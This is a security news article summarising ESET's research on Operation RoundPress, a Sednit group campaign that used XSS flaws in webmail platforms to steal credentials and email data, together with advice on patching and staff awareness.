Webmail services, hailed for their flexibility and cost-effectiveness, have become a staple for businesses of all sizes, especially small and medium enterprises opting for easy, browser-based access to corporate email.
However, ESET research warns that these advantages come with substantial risk: cybercriminal groups are increasingly exploiting vulnerabilities in webmail platforms through advanced cross-site scripting (XSS) attacks.
The recent disclosure of Operation RoundPress by the notorious Sednit group highlights a sustained campaign of espionage, exposing vulnerabilities in widely used webmail software and confirming that webmail remains a lucrative target for threat actors.
Despite the evolution of collaborative platforms, email remains the backbone of business communications.
The global user base for email surpassed 4.37 billion in 2023, with 347 billion emails sent daily a figure projected to rise to 408 billion by 2027.
Telemetry from Litmus shows that, following Apple Mail, webmail environments constituted the second most popular method for email engagement, accounting for 36% of use in 2022.
Yet, the popularity of webmail has given cybercriminals a wide attack surface, amplified by a perceived sense of security and ease of maintenance that is not always matched by rigorous cybersecurity practices.
Sednit’s Sophisticated XSS Campaigns
The Sednit group, aligned with Russian interests, has been orchestrating targeted attacks against high-value webmail servers using XSS-based exploits.
Beginning with Operation Roundcube and expanding through Operation RoundPress, Sednit has leveraged both known and zero-day vulnerabilities in popular webmail applications, including Horde, MDaemon, and Zimbra.
The primary attack vector has been malicious emails containing embedded JavaScript payloads, exploiting flaws in the webmail service to execute code in the user’s browser as soon as the email is opened.
Unlike traditional malware requiring installation or user action beyond opening an email, these XSS payloads are often invisible, making detection challenging.
Most victims have been government entities and defense contractors, particularly in Eastern Europe, but recent campaigns have also targeted governmental organizations in Africa, Europe, and South America.
The attacks often employ spearphishing, delivering emails that mimic newsworthy events especially those related to Ukraine to lure recipients into opening malicious messages.
Once triggered, the XSS vulnerabilities allow attackers to harvest credentials, exfiltrate contacts, email contents, settings, and two-factor authentication secrets, and even create app passwords that bypass otherwise robust security protections.
Urgency for Patch Management
Industry data underscores the threat: according to a 2024 Forrester report, 22% of breaches originating from external attacks exploited web application vulnerabilities, including XSS.
Alarmingly, cybercriminals are not just leveraging new vulnerabilities but are also able to compromise businesses using exploits for flaws that have been public for months or even years due to slow patching cycles.
The rapid discovery and patching of the MDaemon zero-day vulnerability addressed within two weeks of disclosure by ESET illustrates that, while the risk is real and evolving, timely action can effectively neutralize emergent threats.
According to the Report, ESET emphasizes that businesses must not view webmail as a set-and-forget solution.
Applying patches immediately upon release, raising employee awareness about phishing and spearphishing tactics, and deploying comprehensive endpoint and network security tools remain essential defenses.
The RoundPress campaign demonstrates that, while attackers are persistent and sophisticated, basic cybersecurity hygiene including regular updates and staff training can significantly reduce the risk of compromise.
Notably, ESET claims its clients benefited from layered protection, with firewalls blocking data exfiltration and endpoint software halting the execution of malicious scripts, mitigating the operational impact of this campaign.
The rise in XSS attacks targeting webmail platforms signals a pressing need for vigilance: as the reliance on email for business communications grows, so too does the requirement for rigorous, continuous cybersecurity oversight.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
